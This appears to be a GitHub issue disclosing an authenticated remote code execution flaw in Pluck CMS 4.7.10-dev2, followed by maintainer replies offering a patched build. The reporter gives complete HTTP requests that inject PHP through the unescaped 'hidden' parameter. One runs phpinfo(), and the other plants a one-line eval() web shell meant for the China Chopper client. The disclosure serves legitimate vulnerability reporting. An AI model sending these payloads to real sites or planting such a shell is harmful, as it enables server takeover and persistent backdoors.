search

pluck-cms / pluck

Central repo for pluck cms
http://www.pluck-cms.org
54 stars 37 forks source link

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page #80

Closed SecurityCN closed 4 years ago

SecurityCN commented 4 years ago

Pluck-4.7.10-dev2 admin background exists a remote command execution vulnerability when creating a new web page

Vulnerability location: data\inc\functions.admin.php 531-535 line 2019-10-21-15-39-25

Saves the hidden parameter passed by the POST request to php, but does not escape the special character (') in the value, which can directly close the php syntax remote execution command, such as phpinfo(), eval(), etc.

Demo: After the installation is successful, go to the management background.Create a new page, enter a title and content Select "Show webpage",submit the request and then grab the request packet to modify the value of the hidden parameter to "no"; phpinfo();'" 2019-10-21-15-29-59

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 131

title=aaaa&seo_name=&content=%3Cp%3Eaaaa%3C%2Fp%3E&description=&keywords=&hidden=no';phpinfo();'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

2019-10-21-15-22-36

2019-10-21-15-23-39

http://192.168.80.1/pluck-4.7.10-dev2/?file=aaaa 2019-10-21-15-24-43

Write a sentence Trojan

POST /pluck-4.7.10-dev2/admin.php?action=editpage HTTP/1.1
Host: 192.168.80.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.1/pluck-4.7.10-dev2/admin.php?action=editpage
Cookie: PHPSESSID=b01p8o9n85qbjq6f1tj50anlp3
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

title=bbbb&seo_name=&content=%3Cp%3Ebbbb%3C%2Fp%3E&description=&keywords=&hidden=no';@eval($_POST[b]);'&sub_page=&theme=default&save=%E5%82%A8%E5%AD%98

Use chopper connection 2019-10-21-15-27-59

BSteelooper commented 4 years ago

Could you please test the attached version?

pluck-4.7.10-dev3.tar.gz

BSteelooper commented 4 years ago

Have you retested with the latest dev version?